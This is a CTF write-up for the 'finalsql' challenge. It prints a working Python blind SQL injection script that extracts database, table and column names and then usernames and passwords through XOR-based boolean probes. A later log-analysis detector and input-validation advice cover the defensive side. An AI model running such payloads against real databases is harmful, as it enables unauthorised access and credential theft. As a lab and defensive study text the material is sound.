[geek challenge 2019] finalsql 1
2022-07-27 08:13:00 【weixin_ fifty-three million one hundred and fifty thousand four】
Weekly learning summary
Open the web link:

Typing into the input box here does nothing. The challenge hints at SQL injection, so follow the prompt and click the fifth one, which displays:

Here we look at the sixth page:
Combined with the hints given by the web page, this may be an injection point, and a blind injection. Then use Burp to test what is filtered; spaces, among other things, are filtered. Here I would use sqlmap for the blind injection, but I do not know how to use it, so I found a payload online written by more experienced players:
```python
import requests
import time

url = "http://269eac17-6039-4ac9-a491-e6e090ef7bd5.node4.buuoj.cn:81/search.php"
temp = {"id": ""}
column = ""
for i in range(1, 1000):
    time.sleep(0.06)  # interval between characters
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        # Database names: the first %d is the character position,
        # the second %d is the value the current character is compared with
        # temp["id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" %(i,mid)
        # Table names
        # temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1" %(i,mid)
        # Column names
        # temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" %(i,mid)
        # Content
        temp["id"] = "1^(ascii(substr((select(group_concat(id,username,password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)
        r = requests.get(url, params=temp)
        time.sleep(0.04)
        print(low, high, mid, ":")
        # "Click" in the response means the comparison was true
        if "Click" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # Stop once the search runs off the printable range (end of data)
    if mid == 32 or mid == 127:
        break
    column += chr(mid)
    print(column)
print("All:", column)
```

Finally, you can get the flag.
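From the defender's side, the script above leaves a recognisable trace in the access log: many `id` values from one client that differ only in the character position and the comparison threshold. The following is an added example, not part of the original post, that groups log lines by that digit-normalised shape; the log format, IP addresses and `min_probes` threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, quote

# Payload shape taken from the script on this page; used only to build sample log lines.
PROBE = "1^(ascii(substr((select(group_concat(id,username,password))from(F1naI1y)),%d,1))>%d)^1"
SQL_TOKENS = re.compile(r"(?i)\b(ascii|substr|select|group_concat|information_schema)\b")
LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+"')  # assumed minimal log format


def sample_log():
    """Constructed access log: five normal page clicks plus eight blind-injection probes."""
    lines = ['10.0.0.7 "GET /search.php?id=%d HTTP/1.1"' % n for n in range(1, 6)]
    for pos in (1, 2):
        for mid in (80, 104, 92, 98):
            encoded = quote(PROBE % (pos, mid), safe="")
            lines.append('10.0.0.9 "GET /search.php?id=%s HTTP/1.1"' % encoded)
    return lines


def template(value):
    """Collapse every digit run to N so probes differing only in numbers look identical."""
    return re.sub(r"\d+", "N", value)


def find_blind_sqli(lines, param="id", min_probes=5):
    """Return {(client, path, template): distinct probe count} for suspicious groups."""
    groups = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        for value in parse_qs(url.query).get(param, []):
            if value.isdigit():
                continue  # the page only ever links to plain numeric ids
            groups[(client, url.path, template(value))].add(value)
    return {
        key: len(values)
        for key, values in groups.items()
        if len(values) >= min_probes and SQL_TOKENS.search(key[2])
    }


if __name__ == "__main__":
    for (client, path, shape), count in find_blind_sqli(sample_log()).items():
        print(client, path, count, shape)
```

Because `id` is only ever a small integer on this page, rejecting any non-numeric value before it reaches the query removes the injection point that the space filter failed to close.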
Summary
- The information displayed on the page needs to be analyzed